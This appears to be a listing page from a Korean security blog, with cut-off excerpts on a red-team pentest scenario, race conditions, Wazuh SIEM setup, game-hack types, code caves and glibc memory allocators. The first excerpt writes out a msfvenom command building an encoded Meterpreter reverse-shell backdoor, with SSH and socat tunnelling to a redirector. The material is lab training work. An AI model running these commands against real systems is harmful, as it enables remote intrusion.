SEO

본 시나리오와 실습은 금융보안아카데미 내 금붕어 아카데미 팀 프로젝트에서 진행하였습니다.   시나리오 기반 펜테스팅1. 공격 준비msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai 0i 5 -b '\x00' LHOST=[리다이렉터 IP] LPORT=80 -f exe > payload.exe리버스 쉘을 연결하는 Meterpreter 백도어를 생성하였습니다. ssh -i goldfish-redteam ubuntu@[EC2 IP] -R [EC2 아웃바운드 포트 번호]:127.0.0.1:[KALI 인바운드 포트 번호]HTTP 리다이렉터(EC2)의 2222 포트로 나가는 트래픽을 칼리의 4321 포트 전송합니다. sudo socat tcp-list..

최근 CS 지식과 기초 보안 개념을 다시 점검할 기회가 있었습니다.정말 부끄럽게도, 원리나 세부적인 내용을 깊이 있게 이해하지 못한 채 단순히 정의만 알고 있는 경우가 많았습니다.그동안 공부한 시간이 적지 않은데도 기본적인 개념조차 헷갈려하는 제 모습을 보며 반성 많이 했습니다. 하하아무튼! 앞으로 같은 실수를 반복하지 않기 위해 이제부터라도 관련 개념들을 제대로 정리해보려고 합니다..! Race Condition이란?여러 개의 스레드(또는 프로세스)가 공유 자원에 접근할 때 실행 순서에 따라 예상치 못한 결과가 발생하는 현상입니다. Race Condition 문제 상황현재 상황 : 은행 계좌에 100원의 잔고가 존재하며, 동시에 스레드 1과 2가 실행됨정상 동작 : 잔고 20원이 남아야 함스레드 1 :..

최근 포트폴리오를 다시 정리하면서 이전에 올렸어야했던(까먹고 올리지 않았던) 다수의 문서를 발견했습니다 하하하사실 이번 문서는 CVE-2022-26923 PoC와 Sigma 룰을 포스팅한 이후에 작성하려고 임시저장하고 있던 글이었는데 업로드 시간이 점점 늦어지는 것 같아서 먼저 업로드하게 되었습니다. 그래서 이야기의 선후가 좀 맞지 않을 수도 있다는 점 감안하고 읽어주시면 감사하겠습니다 :)지금부터라도 다시 정리해서 올려보려고 합니다...    본 시나리오와 실습은 금융보안아카데미 내 금붕어 아카데미 팀 프로젝트에서 진행하였습니다. 공격 시나리오사진과 같은 구조로 구축된 홈랩과 레드팀 환경에서 공격을 수행하였습니다. 전체 시나리오 요약은 위와 같습니다. 사실 시나리오 작성부터 쉽지 않았습니다 하하위 내용..

구축 전 준비사항먼저 Docker의 호스트가 될 ubuntu 가상머신의 메모리를 6GB를 할당하겠습니다. 공식 문서에서는 최소 6GB의 램을 추천하고 있습니다. 그리고 max_map_count 설정을 해주어야 합니다. Wazuh Indexer는 많은 메모리 매핑 영역을 생성하기 때문에 커널이 하나의 프로세스에 대해 최소 262,144개의 메모리 매핑 영역을 허용하도록 설정해야 합니다. 공식 문서에서는 현재 세션에서만 제공되는 일시적인 방법과 영구적인 방법을 소개하고 있습니다. 저는 영구적인 방법을 통해 메모리 매핑 영역을 확장시키겠습니다. echo "vm.max_map_count=262144" >> /etc/sysctl.confsysctl -p /etc/sysctl.conf 파일을 수정하여 vm.max_..

Wazuh란?Wazuh는 XDR과 SIEM 기능을 제공하는 통합 보안 플랫폼입니다. 온프레미스, 가상화, 컨테이너, 클라우드 기반 환경에서 데이터 자산을 보호하는 강력한 오픈소스 도구로, 조직이 다양한 보안 위협으로부터 시스템을 보호할 수 있도록 지원합니다.Wazuh의 주요 기능은 다음과 같습니다.위협 탐지 및 대응실시간 로그 분석 및 이벤트 수집을 통해 보안 위협을 탐지하고 대응로그 데이터 분석 및 시각화를 통한 보안 이벤트 관리무결성 검사파일 및 디렉터리의 변경 사항을 모니터링하여 무단 변경을 탐지취약점 탐지 및 관리운영체제 및 애플리케이션의 취약점을 정기적으로 검사하여 보안 상태를 평가하고 패치가 필요한 영역을 파악HIDS (호스트 기반 침입 탐지 시스템)각 호스트에서 실행되는 프로세스, 네트워크 ..

게임핵의 종류를 RTS/RPG 및 FPS 장르로 나누어 간략히 소개하겠습니다. 다양한 종류의 게임을 많이 접해보셨다면 이미 모두 알고 있는 유형의 게임일 것 같습니다ㅎㅎ 저는 FPS만 플레이하던 유저로써 이번에 처음 알게 된 재밌는 핵들이 많은 것 같네요. RTS/RPG HACKS실시간 전략(RTS) 및 롤플레잉 게임(RPG)에서 사용되는 대표적인 핵의 종류는 다음과 같습니다. 1. Stat Hack게임 클라이언트에서 캐릭터의 스탯(공격력, 방어력, 체력 등)을 조작하여 강화시키는 핵입니다.Cheat Engine과 같은 메모리 조작 도구를 이용해 스탯 값을 변경하거나 패킷을 변조하여 서버에 다른 데이터를 전송하여 구현할 수 있습니다.2. Map Hack 게임에서 기본적으로 보이지 않아야하는 영역을 강제로..

https://gamehacking.academy/pages/2/07/ 이 글은 Gamehacking Academy의 자료를 참고하여 작성된 것입니다. 앞선 두 번의 실습에서 게임 코드를 변경하여 비정상적인 로직을 만들었습니다. 하지만 해당 코드 패치는 현재 실행 중인 게임에만 적용되는 1회성인 코드 패치였습니다. 또한 단순히 코드를 nop으로 패치했기 때문에 어떤 로직에서 어떤 오류가 발생할지 모르는 상황입니다. 이러한 상황에서 원래 명령어를 유지하면서 다른 명령어를 실행시키도록 하면 프로그램이 정상적으로 동작할 수 있겠죠?이때 사용할 수 있는 것이 Code Cave 라는 개념입니다. Code Cave란?Code Cave는 실행 파일의 빈 공간에 코드를 삽입해 동작을 변경하거나 새로운 기능을 추가하는 ..

멀티스레딩 환경에서 동적 메모리 할당의 변화멀티스레딩 환경에서 효율적인 동적 메모리 할당은 성능에 중요한 영향을 미칩니다. 리눅스 초기에는 dlmalloc이라는 메모리 할당자를 사용했지만, 이후에 멀티스레딩 성능을 개선한 ptmalloc2로 대체되었습니다. 1. dlmallocdlmalloc은 리눅스 초창기에 사용된 기본 메모리 할당자입니다.여러 스레드가 동시에 malloc 함수를 호출하면, freelist라는 데이터 구조를 공유합니다.freelist : 사용 가능한 메모리 블록들의 목록이 과정에서 하나의 스레드만 임계 영역에 진입하여 메모리를 할당받을 수 있으므로, 다른 스레드는 대기해야 합니다.이러한 동작 방식은 멀티스레딩 환경에서 병목현상을 초래하고, 성능 저하로 이어지게 됩니다.2. ptmallo..